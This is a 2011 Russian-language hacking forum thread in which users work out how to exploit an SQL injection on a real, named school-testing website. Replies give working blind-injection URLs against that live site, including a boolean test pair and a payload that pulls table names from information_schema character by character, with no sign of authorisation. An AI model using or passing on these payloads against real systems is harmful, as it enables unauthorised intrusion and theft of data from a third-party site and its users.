Динамическое количество столбцов
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Динамическое количество столбцов - 2011-11-17 22:56:14.080000
|
|
|
E1ektr0
Сообщений: 9
Оценки: 0
Присоединился: 2008-04-17 21:18:45.650000
|
Собственно, попалась мне забавная(хитрая) SQL Inj. T-SQL Классический MySql Сама по себе она простая, но разработчик сайта не знаком с join по сему писал несколько запросов ручками на php. Результаты будут выведены только в случае отработки всех запросов одновременно. И вот не задача, параметр, через который можно провести sql inj участвует в нескольких запросах с разным количеством столбцов. Ну так я посмотрел на неё, посмотрел, по тыркался, поглядел на if на left join….подумал, и решил задать вопрос, а вообще возможно это раскрутить? SELECT id, num_shown FROM t_theme WHERE test_id = {sql inj}; SELECT title FROM t_test WHERE published = 1 AND id = {sql inj};
|
|
|
RE: Динамическое количество столбцов - 2011-11-18 08:37:06.413333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Подзапросы. Через ошибку. И вообще, ссылку в студию.
|
|
|
RE: Динамическое количество столбцов - 2011-11-18 09:03:51.253333
|
|
|
E1ektr0
Сообщений: 9
Оценки: 0
Присоединился: 2008-04-17 21:18:45.650000
|
quote:
ORIGINAL: r1dex Подзапросы. Через ошибку. И вообще, ссылку в студию. Гм, подробней пожалусто. p.s. http://xn–80aanvfcr3a9c.xn–p1ai/pub/test/index.php?testId=-1%20union%20select%201; p.p.s. Да да, это рф))))
|
|
|
RE: Динамическое количество столбцов - 2011-11-18 13:03:20.626666
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
В принципе имеет место быть посимвольное извлечение данных, http://xn–80aanvfcr3a9c.xn–p1ai/pub/test/index.php?testId=17+and+1=1 страница теста, http://xn–80aanvfcr3a9c.xn–p1ai/pub/test/index.php?testId=17+and+1=2 редирект на главную
|
|
|
RE: Динамическое количество столбцов - 2011-11-18 23:27:35.236666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Подзапросами: http://меташкола.рф/pub/test/index.php?testId=19+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1–+ Через ошибку в данном случае никак.
|
|
|
RE: Динамическое количество столбцов - 2011-11-19 01:44:37.943333
|
|
|
E1ektr0
Сообщений: 9
Оценки: 0
Присоединился: 2008-04-17 21:18:45.650000
|
quote:
ORIGINAL: Сaptain T0ma5o В принципе имеет место быть посимвольное извлечение данных, http://xn–80aanvfcr3a9c.xn–p1ai/pub/test/index.php?testId=17+and+1=1 страница теста, http://xn–80aanvfcr3a9c.xn–p1ai/pub/test/index.php?testId=17+and+1=2 редирект на главную quote:
ORIGINAL: r1dex Подзапросами: http://меташкола.рф/pub/test/index.php?testId=19+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1–+ Через ошибку в данном случае никак. Спасибо ребят, с таким подходом к sql inj знаком не был.
|
|
|
|
|